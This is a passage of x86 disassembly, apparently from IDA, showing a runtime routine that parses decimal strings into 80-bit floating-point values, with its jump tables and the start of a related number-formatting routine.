loc_436598: ; CODE XREF: sub_4363F0+188�j
; sub_4363F0+191�j
movsx eax, byte ptr [ebp+var_3C]
movsx ecx, ds:byte_453DF4
cmp eax, ecx
jnz short loc_4365B0
mov [ebp+var_4C], 4
jmp short loc_43661B
; ---------------------------------------------------------------------------
loc_4365B0: ; CODE XREF: sub_4363F0+1B5�j
movsx edx, byte ptr [ebp+var_3C]
mov [ebp+var_88], edx
mov eax, [ebp+var_88]
sub eax, 2Bh
mov [ebp+var_88], eax
cmp [ebp+var_88], 3Ah
ja short loc_43660B
mov edx, [ebp+var_88]
xor ecx, ecx
mov cl, byte_436E4A[edx]
jmp off_436E3A[ecx*4]
loc_4365E7: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E3E�o
mov [ebp+var_4C], 1
jmp short loc_43661B
; ---------------------------------------------------------------------------
loc_4365F0: ; CODE XREF: sub_4363F0+D5�j
; sub_4363F0+1F0�j
; DATA XREF: ...
mov [ebp+var_4C], 6
jmp short loc_43661B
; ---------------------------------------------------------------------------
loc_4365F9: ; CODE XREF: sub_4363F0+D5�j
; sub_4363F0+1F0�j
; DATA XREF: ...
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
mov [ebp+var_4C], 0Bh
jmp short loc_43661B
; ---------------------------------------------------------------------------
loc_43660B: ; CODE XREF: sub_4363F0+D5�j
; sub_4363F0+1E0�j ...
mov [ebp+var_4C], 0Ah
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
loc_43661B: ; CODE XREF: sub_4363F0+1A3�j
; sub_4363F0+1BE�j ...
jmp loc_436BF3
; ---------------------------------------------------------------------------
loc_436620: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E12�o
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 31h
jl short loc_436644
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 39h
jg short loc_436644
mov [ebp+var_4C], 3
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_436686
; ---------------------------------------------------------------------------
loc_436644: ; CODE XREF: sub_4363F0+237�j
; sub_4363F0+240�j
movsx edx, byte ptr [ebp+var_3C]
movsx eax, ds:byte_453DF4
cmp edx, eax
jnz short loc_43665C
mov [ebp+var_4C], 5
jmp short loc_436686
; ---------------------------------------------------------------------------
loc_43665C: ; CODE XREF: sub_4363F0+261�j
mov cl, byte ptr [ebp+var_3C]
mov [ebp+var_8C], cl
cmp [ebp+var_8C], 30h
jz short loc_436670
jmp short loc_436679
; ---------------------------------------------------------------------------
loc_436670: ; CODE XREF: sub_4363F0+27C�j
mov [ebp+var_4C], 1
jmp short loc_436686
; ---------------------------------------------------------------------------
loc_436679: ; CODE XREF: sub_4363F0+27E�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_64]
mov [ebp+var_4], edx
loc_436686: ; CODE XREF: sub_4363F0+252�j
; sub_4363F0+26A�j ...
jmp loc_436BF3
; ---------------------------------------------------------------------------
loc_43668B: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E16�o
mov [ebp+var_54], 1
jmp short loc_4366A5
; ---------------------------------------------------------------------------
loc_436694: ; CODE XREF: sub_4363F0:loc_43671F�j
mov eax, [ebp+var_4]
mov cl, [eax]
mov byte ptr [ebp+var_3C], cl
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_4366A5: ; CODE XREF: sub_4363F0+2A2�j
cmp ds:dword_453DF0, 1
jle short loc_4366C9
push 4
mov eax, [ebp+var_3C]
and eax, 0FFh
push eax
call sub_427040
add esp, 8
mov [ebp+var_90], eax
jmp short loc_4366E7
; ---------------------------------------------------------------------------
loc_4366C9: ; CODE XREF: sub_4363F0+2BC�j
mov ecx, [ebp+var_3C]
and ecx, 0FFh
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 4
mov [ebp+var_90], eax
loc_4366E7: ; CODE XREF: sub_4363F0+2D7�j
cmp [ebp+var_90], 0
jz short loc_436724
cmp [ebp+var_70], 19h
jnb short loc_436716
mov ecx, [ebp+var_70]
add ecx, 1
mov [ebp+var_70], ecx
movsx edx, byte ptr [ebp+var_3C]
sub edx, 30h
mov eax, [ebp+var_68]
mov [eax], dl
mov ecx, [ebp+var_68]
add ecx, 1
mov [ebp+var_68], ecx
jmp short loc_43671F
; ---------------------------------------------------------------------------
loc_436716: ; CODE XREF: sub_4363F0+304�j
mov edx, [ebp+var_6C]
add edx, 1
mov [ebp+var_6C], edx
loc_43671F: ; CODE XREF: sub_4363F0+324�j
jmp loc_436694
; ---------------------------------------------------------------------------
loc_436724: ; CODE XREF: sub_4363F0+2FE�j
movsx eax, byte ptr [ebp+var_3C]
movsx ecx, ds:byte_453DF4
cmp eax, ecx
jnz short loc_43673C
mov [ebp+var_4C], 4
jmp short loc_43679E
; ---------------------------------------------------------------------------
loc_43673C: ; CODE XREF: sub_4363F0+341�j
movsx edx, byte ptr [ebp+var_3C]
mov [ebp+var_94], edx
mov eax, [ebp+var_94]
sub eax, 2Bh
mov [ebp+var_94], eax
cmp [ebp+var_94], 3Ah
ja short loc_43678E
mov edx, [ebp+var_94]
xor ecx, ecx
mov cl, byte_436E91[edx]
jmp off_436E85[ecx*4]
loc_436773: ; DATA XREF: _0:00436E89�o
mov [ebp+var_4C], 6
jmp short loc_43679E
; ---------------------------------------------------------------------------
loc_43677C: ; CODE XREF: sub_4363F0+37C�j
; DATA XREF: _0:off_436E85�o
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
mov [ebp+var_4C], 0Bh
jmp short loc_43679E
; ---------------------------------------------------------------------------
loc_43678E: ; CODE XREF: sub_4363F0+36C�j
; sub_4363F0+37C�j
; DATA XREF: ...
mov [ebp+var_4C], 0Ah
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
loc_43679E: ; CODE XREF: sub_4363F0+34A�j
; sub_4363F0+38A�j ...
jmp loc_436BF3
; ---------------------------------------------------------------------------
loc_4367A3: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E1A�o
mov [ebp+var_54], 1
mov [ebp+var_C], 1
cmp [ebp+var_70], 0
jnz short loc_4367DE
jmp short loc_4367CA
; ---------------------------------------------------------------------------
loc_4367B9: ; CODE XREF: sub_4363F0+3EC�j
mov edx, [ebp+var_4]
mov al, [edx]
mov byte ptr [ebp+var_3C], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_4367CA: ; CODE XREF: sub_4363F0+3C7�j
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 30h
jnz short loc_4367DE
mov eax, [ebp+var_6C]
sub eax, 1
mov [ebp+var_6C], eax
jmp short loc_4367B9
; ---------------------------------------------------------------------------
loc_4367DE: ; CODE XREF: sub_4363F0+3C5�j
; sub_4363F0+3E1�j
jmp short loc_4367F1
; ---------------------------------------------------------------------------
loc_4367E0: ; CODE XREF: sub_4363F0:loc_436869�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_3C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_4367F1: ; CODE XREF: sub_4363F0:loc_4367DE�j
cmp ds:dword_453DF0, 1
jle short loc_436816
push 4
mov ecx, [ebp+var_3C]
and ecx, 0FFh
push ecx
call sub_427040
add esp, 8
mov [ebp+var_98], eax
jmp short loc_436833
; ---------------------------------------------------------------------------
loc_436816: ; CODE XREF: sub_4363F0+408�j
mov edx, [ebp+var_3C]
and edx, 0FFh
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_98], ecx
loc_436833: ; CODE XREF: sub_4363F0+424�j
cmp [ebp+var_98], 0
jz short loc_43686E
cmp [ebp+var_70], 19h
jnb short loc_436869
mov edx, [ebp+var_70]
add edx, 1
mov [ebp+var_70], edx
movsx eax, byte ptr [ebp+var_3C]
sub eax, 30h
mov ecx, [ebp+var_68]
mov [ecx], al
mov edx, [ebp+var_68]
add edx, 1
mov [ebp+var_68], edx
mov eax, [ebp+var_6C]
sub eax, 1
mov [ebp+var_6C], eax
loc_436869: ; CODE XREF: sub_4363F0+450�j
jmp loc_4367E0
; ---------------------------------------------------------------------------
loc_43686E: ; CODE XREF: sub_4363F0+44A�j
movsx ecx, byte ptr [ebp+var_3C]
mov [ebp+var_9C], ecx
mov edx, [ebp+var_9C]
sub edx, 2Bh
mov [ebp+var_9C], edx
cmp [ebp+var_9C], 3Ah
ja short loc_4368C0
mov ecx, [ebp+var_9C]
xor eax, eax
mov al, byte_436ED8[ecx]
jmp off_436ECC[eax*4]
loc_4368A5: ; DATA XREF: _0:00436ED0�o
mov [ebp+var_4C], 6
jmp short loc_4368D0
; ---------------------------------------------------------------------------
loc_4368AE: ; CODE XREF: sub_4363F0+4AE�j
; DATA XREF: _0:off_436ECC�o
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov [ebp+var_4C], 0Bh
jmp short loc_4368D0
; ---------------------------------------------------------------------------
loc_4368C0: ; CODE XREF: sub_4363F0+49E�j
; sub_4363F0+4AE�j
; DATA XREF: ...
mov [ebp+var_4C], 0Ah
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_4368D0: ; CODE XREF: sub_4363F0+4BC�j
; sub_4363F0+4CE�j
jmp loc_436BF3
; ---------------------------------------------------------------------------
loc_4368D5: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E1E�o
mov [ebp+var_C], 1
cmp ds:dword_453DF0, 1
jle short loc_436901
push 4
mov ecx, [ebp+var_3C]
and ecx, 0FFh
push ecx
call sub_427040
add esp, 8
mov [ebp+var_A0], eax
jmp short loc_43691E
; ---------------------------------------------------------------------------
loc_436901: ; CODE XREF: sub_4363F0+4F3�j
mov edx, [ebp+var_3C]
and edx, 0FFh
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_A0], ecx
loc_43691E: ; CODE XREF: sub_4363F0+50F�j
cmp [ebp+var_A0], 0
jz short loc_436939
mov [ebp+var_4C], 4
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
jmp short loc_436946
; ---------------------------------------------------------------------------
loc_436939: ; CODE XREF: sub_4363F0+535�j
mov [ebp+var_4C], 0Ah
mov eax, [ebp+var_64]
mov [ebp+var_4], eax
loc_436946: ; CODE XREF: sub_4363F0+547�j
jmp loc_436BF3
; ---------------------------------------------------------------------------
loc_43694B: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E22�o
mov ecx, [ebp+var_4]
sub ecx, 2
mov [ebp+var_64], ecx
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 31h
jl short loc_436978
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 39h
jg short loc_436978
mov [ebp+var_4C], 9
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_4369CD
; ---------------------------------------------------------------------------
loc_436978: ; CODE XREF: sub_4363F0+56B�j
; sub_4363F0+574�j
mov dl, byte ptr [ebp+var_3C]
mov [ebp+var_A4], dl
cmp [ebp+var_A4], 2Bh
jz short loc_4369B7
cmp [ebp+var_A4], 2Dh
jz short loc_4369A7
cmp [ebp+var_A4], 30h
jz short loc_43699E
jmp short loc_4369C0
; ---------------------------------------------------------------------------
loc_43699E: ; CODE XREF: sub_4363F0+5AA�j
mov [ebp+var_4C], 8
jmp short loc_4369CD
; ---------------------------------------------------------------------------
loc_4369A7: ; CODE XREF: sub_4363F0+5A1�j
mov [ebp+var_4C], 7
mov [ebp+var_74], 0FFFFFFFFh
jmp short loc_4369CD
; ---------------------------------------------------------------------------
loc_4369B7: ; CODE XREF: sub_4363F0+598�j
mov [ebp+var_4C], 7
jmp short loc_4369CD
; ---------------------------------------------------------------------------
loc_4369C0: ; CODE XREF: sub_4363F0+5AC�j
mov [ebp+var_4C], 0Ah
mov eax, [ebp+var_64]
mov [ebp+var_4], eax
loc_4369CD: ; CODE XREF: sub_4363F0+586�j
; sub_4363F0+5B5�j ...
jmp loc_436BF3
; ---------------------------------------------------------------------------
loc_4369D2: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E2A�o
mov [ebp+var_18], 1
jmp short loc_4369EC
; ---------------------------------------------------------------------------
loc_4369DB: ; CODE XREF: sub_4363F0+605�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_3C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_4369EC: ; CODE XREF: sub_4363F0+5E9�j
movsx ecx, byte ptr [ebp+var_3C]
cmp ecx, 30h
jnz short loc_4369F7
jmp short loc_4369DB
; ---------------------------------------------------------------------------
loc_4369F7: ; CODE XREF: sub_4363F0+603�j
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 31h
jl short loc_436A1B
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 39h
jg short loc_436A1B
mov [ebp+var_4C], 9
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_436A2B
; ---------------------------------------------------------------------------
loc_436A1B: ; CODE XREF: sub_4363F0+60E�j
; sub_4363F0+617�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_436A2B: ; CODE XREF: sub_4363F0+629�j
jmp loc_436BF3
; ---------------------------------------------------------------------------
loc_436A30: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E26�o
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 31h
jl short loc_436A54
movsx ecx, byte ptr [ebp+var_3C]
cmp ecx, 39h
jg short loc_436A54
mov [ebp+var_4C], 9
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
jmp short loc_436A7E
; ---------------------------------------------------------------------------
loc_436A54: ; CODE XREF: sub_4363F0+647�j
; sub_4363F0+650�j
mov al, byte ptr [ebp+var_3C]
mov [ebp+var_A8], al
cmp [ebp+var_A8], 30h
jz short loc_436A68
jmp short loc_436A71
; ---------------------------------------------------------------------------
loc_436A68: ; CODE XREF: sub_4363F0+674�j
mov [ebp+var_4C], 8
jmp short loc_436A7E
; ---------------------------------------------------------------------------
loc_436A71: ; CODE XREF: sub_4363F0+676�j
mov [ebp+var_4C], 0Ah
mov ecx, [ebp+var_64]
mov [ebp+var_4], ecx
loc_436A7E: ; CODE XREF: sub_4363F0+662�j
; sub_4363F0+67F�j
jmp loc_436BF3
; ---------------------------------------------------------------------------
loc_436A83: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E2E�o
mov [ebp+var_18], 1
mov [ebp+var_7C], 0
jmp short loc_436AA4
; ---------------------------------------------------------------------------
loc_436A93: ; CODE XREF: sub_4363F0:loc_436B12�j
mov edx, [ebp+var_4]
mov al, [edx]
mov byte ptr [ebp+var_3C], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_436AA4: ; CODE XREF: sub_4363F0+6A1�j
cmp ds:dword_453DF0, 1
jle short loc_436AC9
push 4
mov edx, [ebp+var_3C]
and edx, 0FFh
push edx
call sub_427040
add esp, 8
mov [ebp+var_AC], eax
jmp short loc_436AE6
; ---------------------------------------------------------------------------
loc_436AC9: ; CODE XREF: sub_4363F0+6BB�j
mov eax, [ebp+var_3C]
and eax, 0FFh
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_AC], edx
loc_436AE6: ; CODE XREF: sub_4363F0+6D7�j
cmp [ebp+var_AC], 0
jz short loc_436B17
mov eax, [ebp+var_7C]
imul eax, 0Ah
movsx ecx, byte ptr [ebp+var_3C]
lea edx, [eax+ecx-30h]
mov [ebp+var_7C], edx
cmp [ebp+var_7C], 1450h
jle short loc_436B12
mov [ebp+var_7C], 1451h
jmp short loc_436B17
; ---------------------------------------------------------------------------
loc_436B12: ; CODE XREF: sub_4363F0+717�j
jmp loc_436A93
; ---------------------------------------------------------------------------
loc_436B17: ; CODE XREF: sub_4363F0+6FD�j
; sub_4363F0+720�j
mov eax, [ebp+var_7C]
mov [ebp+var_14], eax
jmp short loc_436B30
; ---------------------------------------------------------------------------
loc_436B1F: ; CODE XREF: sub_4363F0+78B�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_3C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_436B30: ; CODE XREF: sub_4363F0+72D�j
cmp ds:dword_453DF0, 1
jle short loc_436B55
push 4
mov ecx, [ebp+var_3C]
and ecx, 0FFh
push ecx
call sub_427040
add esp, 8
mov [ebp+var_B0], eax
jmp short loc_436B72
; ---------------------------------------------------------------------------
loc_436B55: ; CODE XREF: sub_4363F0+747�j
mov edx, [ebp+var_3C]
and edx, 0FFh
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_B0], ecx
loc_436B72: ; CODE XREF: sub_4363F0+763�j
cmp [ebp+var_B0], 0
jz short loc_436B7D
jmp short loc_436B1F
; ---------------------------------------------------------------------------
loc_436B7D: ; CODE XREF: sub_4363F0+789�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
jmp short loc_436BF3
; ---------------------------------------------------------------------------
loc_436B8F: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E36�o
cmp [ebp+arg_18], 0
jz short loc_436BE3
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_64], eax
mov cl, byte ptr [ebp+var_3C]
mov [ebp+var_B4], cl
cmp [ebp+var_B4], 2Bh
jz short loc_436BCB
cmp [ebp+var_B4], 2Dh
jz short loc_436BBB
jmp short loc_436BD4
; ---------------------------------------------------------------------------
loc_436BBB: ; CODE XREF: sub_4363F0+7C7�j
mov [ebp+var_4C], 7
mov [ebp+var_74], 0FFFFFFFFh
jmp short loc_436BE1
; ---------------------------------------------------------------------------
loc_436BCB: ; CODE XREF: sub_4363F0+7BE�j
mov [ebp+var_4C], 7
jmp short loc_436BE1
; ---------------------------------------------------------------------------
loc_436BD4: ; CODE XREF: sub_4363F0+7C9�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_64]
mov [ebp+var_4], edx
loc_436BE1: ; CODE XREF: sub_4363F0+7D9�j
; sub_4363F0+7E2�j
jmp short loc_436BF3
; ---------------------------------------------------------------------------
loc_436BE3: ; CODE XREF: sub_4363F0+7A3�j
mov [ebp+var_4C], 0Ah
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_436BF3: ; CODE XREF: sub_4363F0+CC�j
; sub_4363F0+D5�j ...
jmp loc_436497
; ---------------------------------------------------------------------------
loc_436BF8: ; CODE XREF: sub_4363F0+AB�j
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
cmp [ebp+var_54], 0
jz loc_436D47
cmp [ebp+var_40], 0
jnz loc_436D47
cmp [ebp+var_78], 0
jnz loc_436D47
cmp [ebp+var_70], 18h
jbe short loc_436C4F
movsx eax, [ebp+var_21]
cmp eax, 5
jl short loc_436C36
mov cl, [ebp+var_21]
add cl, 1
mov [ebp+var_21], cl
loc_436C36: ; CODE XREF: sub_4363F0+83B�j
mov [ebp+var_70], 18h
mov edx, [ebp+var_68]
sub edx, 1
mov [ebp+var_68], edx
mov eax, [ebp+var_6C]
add eax, 1
mov [ebp+var_6C], eax
loc_436C4F: ; CODE XREF: sub_4363F0+832�j
cmp [ebp+var_70], 0
jbe loc_436D2A
mov ecx, [ebp+var_68]
sub ecx, 1
mov [ebp+var_68], ecx
jmp short loc_436C6D
; ---------------------------------------------------------------------------
loc_436C64: ; CODE XREF: sub_4363F0+899�j
mov edx, [ebp+var_68]
sub edx, 1
mov [ebp+var_68], edx
loc_436C6D: ; CODE XREF: sub_4363F0+872�j
mov eax, [ebp+var_68]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_436C8B
mov edx, [ebp+var_70]
sub edx, 1
mov [ebp+var_70], edx
mov eax, [ebp+var_6C]
add eax, 1
mov [ebp+var_6C], eax
jmp short loc_436C64
; ---------------------------------------------------------------------------
loc_436C8B: ; CODE XREF: sub_4363F0+885�j
lea ecx, [ebp+var_60]
push ecx
mov edx, [ebp+var_70]
push edx
lea eax, [ebp+var_38]
push eax
call sub_4362B0
add esp, 0Ch
cmp [ebp+var_74], 0
jge short loc_436CAD
mov ecx, [ebp+var_14]
neg ecx
mov [ebp+var_14], ecx
loc_436CAD: ; CODE XREF: sub_4363F0+8B3�j
mov edx, [ebp+var_14]
add edx, [ebp+var_6C]
mov [ebp+var_14], edx
cmp [ebp+var_18], 0
jnz short loc_436CC5
mov eax, [ebp+var_14]
add eax, [ebp+arg_10]
mov [ebp+var_14], eax
loc_436CC5: ; CODE XREF: sub_4363F0+8CA�j
cmp [ebp+var_C], 0
jnz short loc_436CD4
mov ecx, [ebp+var_14]
sub ecx, [ebp+arg_14]
mov [ebp+var_14], ecx
loc_436CD4: ; CODE XREF: sub_4363F0+8D9�j
cmp [ebp+var_14], 1450h
jle short loc_436CE6
mov [ebp+var_40], 1
jmp short loc_436D28
; ---------------------------------------------------------------------------
loc_436CE6: ; CODE XREF: sub_4363F0+8EB�j
cmp [ebp+var_14], 0FFFFEBB0h
jge short loc_436CF8
mov [ebp+var_78], 1
jmp short loc_436D28
; ---------------------------------------------------------------------------
loc_436CF8: ; CODE XREF: sub_4363F0+8FD�j
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+var_14]
push eax
lea ecx, [ebp+var_60]
push ecx
call sub_4395B0
add esp, 0Ch
mov dx, [ebp+var_60]
mov [ebp+var_48], dx
mov eax, [ebp+var_5E]
mov [ebp+var_8], eax
mov ecx, [ebp+var_5A]
mov [ebp+var_10], ecx
mov dx, [ebp+var_56]
mov word ptr [ebp+var_50], dx
loc_436D28: ; CODE XREF: sub_4363F0+8F4�j
; sub_4363F0+906�j
jmp short loc_436D47
; ---------------------------------------------------------------------------
loc_436D2A: ; CODE XREF: sub_4363F0+863�j
mov [ebp+var_48], 0
mov word ptr [ebp+var_50], 0
mov eax, [ebp+var_50]
and eax, 0FFFFh
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
mov [ebp+var_8], ecx
loc_436D47: ; CODE XREF: sub_4363F0+814�j
; sub_4363F0+81E�j ...
cmp [ebp+var_54], 0
jnz short loc_436D76
mov [ebp+var_48], 0
mov word ptr [ebp+var_50], 0
mov edx, [ebp+var_50]
and edx, 0FFFFh
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
mov ecx, [ebp+var_44]
or ecx, 4
mov [ebp+var_44], ecx
jmp short loc_436DCD
; ---------------------------------------------------------------------------
loc_436D76: ; CODE XREF: sub_4363F0+95B�j
cmp [ebp+var_40], 0
jz short loc_436DA1
mov word ptr [ebp+var_50], 7FFFh
mov [ebp+var_10], 80000000h
mov [ebp+var_8], 0
mov [ebp+var_48], 0
mov edx, [ebp+var_44]
or edx, 2
mov [ebp+var_44], edx
jmp short loc_436DCD
; ---------------------------------------------------------------------------
loc_436DA1: ; CODE XREF: sub_4363F0+98A�j
cmp [ebp+var_78], 0
jz short loc_436DCD
mov [ebp+var_48], 0
mov word ptr [ebp+var_50], 0
mov eax, [ebp+var_50]
and eax, 0FFFFh
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
mov [ebp+var_8], ecx
mov edx, [ebp+var_44]
or edx, 1
mov [ebp+var_44], edx
loc_436DCD: ; CODE XREF: sub_4363F0+984�j
; sub_4363F0+9AF�j ...
mov eax, [ebp+arg_0]
mov cx, [ebp+var_48]
mov [eax], cx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+2], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_10]
mov [ecx+6], edx
mov eax, [ebp+var_50]
and eax, 0FFFFh
mov ecx, [ebp+var_1C]
and ecx, 0FFFFh
or eax, ecx
mov edx, [ebp+arg_0]
mov [edx+0Ah], ax
mov eax, [ebp+var_44]
mov esp, ebp
pop ebp
retn
sub_4363F0 endp
; ---------------------------------------------------------------------------
off_436E0A dd offset loc_4364CC ; DATA XREF: sub_4363F0+D5�r
dd offset loc_43656A
dd offset loc_436620
dd offset loc_43668B
dd offset loc_4367A3
dd offset loc_4368D5
dd offset loc_43694B
dd offset loc_436A30
dd offset loc_4369D2
dd offset loc_436A83
dd offset loc_436BF3
dd offset loc_436B8F
off_436E3A dd offset loc_4365F9 ; DATA XREF: sub_4363F0+1F0�r
dd offset loc_4365E7
dd offset loc_4365F0
dd offset loc_43660B
byte_436E4A db 0 ; DATA XREF: sub_4363F0+1EA�r
db 3
dd 1030300h, 4 dup(3030303h), 2030303h, 3030302h, 6 dup(3030303h)
dd 2030303h
db 2
off_436E85 dd offset loc_43677C ; DATA XREF: sub_4363F0+37C�r
dd offset loc_436773
dd offset loc_43678E
byte_436E91 db 0, 2, 0, 16h dup(2), 2 dup(1), 1Eh dup(2), 2 dup(1)
; DATA XREF: sub_4363F0+376�r
off_436ECC dd offset loc_4368AE ; DATA XREF: sub_4363F0+4AE�r
dd offset loc_4368A5
dd offset loc_4368C0
byte_436ED8 db 0, 2, 0, 16h dup(2), 2 dup(1), 1Eh dup(2), 2 dup(1)
; DATA XREF: sub_4363F0+4A8�r
db 0Dh dup(0CCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 14h
push 0
push 0
push 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
lea eax, [ebp-0Ch]
push eax
call sub_4363F0
add esp, 1Ch
mov [ebp-14h], eax
mov ecx, [ebp+8]
push ecx
lea edx, [ebp-0Ch]
push edx
call sub_432A60
add esp, 8
mov [ebp-10h], eax
cmp dword ptr [ebp-10h], 1
jnz short loc_436F68
mov eax, [ebp-14h]
or al, 2
mov [ebp-14h], eax
loc_436F68: ; CODE XREF: _0:00436F5E�j
mov eax, [ebp-14h]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_436F70 proc near ; CODE XREF: sub_432CE0+36�p
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = word ptr -5Ch
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_52 = byte ptr -52h
var_51 = byte ptr -51h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_32 = dword ptr -32h
var_2E = dword ptr -2Eh
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 74h
mov word ptr [ebp+var_64], 4D10h
mov word ptr [ebp+var_3C], 4Dh
mov word ptr [ebp+var_60], 9Ah
mov [ebp+var_20], 134312F4h
mov [ebp+var_54], 0CCh
mov [ebp+var_53], 0CCh
mov [ebp+var_52], 0CCh
mov [ebp+var_51], 0CCh
mov [ebp+var_50], 0CCh
mov [ebp+var_4F], 0CCh
mov [ebp+var_4E], 0CCh
mov [ebp+var_4D], 0CCh
mov [ebp+var_4C], 0CCh
mov [ebp+var_4B], 0CCh
mov [ebp+var_4A], 0FBh
mov [ebp+var_49], 3Fh
mov [ebp+var_58], 1
mov ax, [ebp+arg_8]
mov word ptr [ebp+var_70], ax
mov ecx, [ebp+arg_4]
mov [ebp+var_24], ecx
mov edx, [ebp+arg_0]
mov [ebp+var_48], edx
mov eax, [ebp+var_70]
and eax, 0FFFFh
and eax, 8000h
mov word ptr [ebp+var_68], ax
mov cx, word ptr [ebp+var_70]
and cx, 7FFFh
mov word ptr [ebp+var_70], cx
mov edx, [ebp+var_68]
and edx, 0FFFFh
test edx, edx
jz short loc_43700E
mov eax, [ebp+arg_14]
mov byte ptr [eax+2], 2Dh
jmp short loc_437015
; ---------------------------------------------------------------------------
loc_43700E: ; CODE XREF: sub_436F70+93�j
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+2], 20h
loc_437015: ; CODE XREF: sub_436F70+9C�j
mov edx, [ebp+var_70]
and edx, 0FFFFh
test edx, edx
jnz short loc_43705C
cmp [ebp+var_24], 0
jnz short loc_43705C
cmp [ebp+var_48], 0
jnz short loc_43705C
mov eax, [ebp+arg_14]
mov word ptr [eax], 0
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+2], 20h
mov edx, [ebp+arg_14]
mov byte ptr [edx+3], 1
mov eax, [ebp+arg_14]
mov byte ptr [eax+4], 30h
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+5], 0
mov eax, 1
jmp loc_437482
; ---------------------------------------------------------------------------
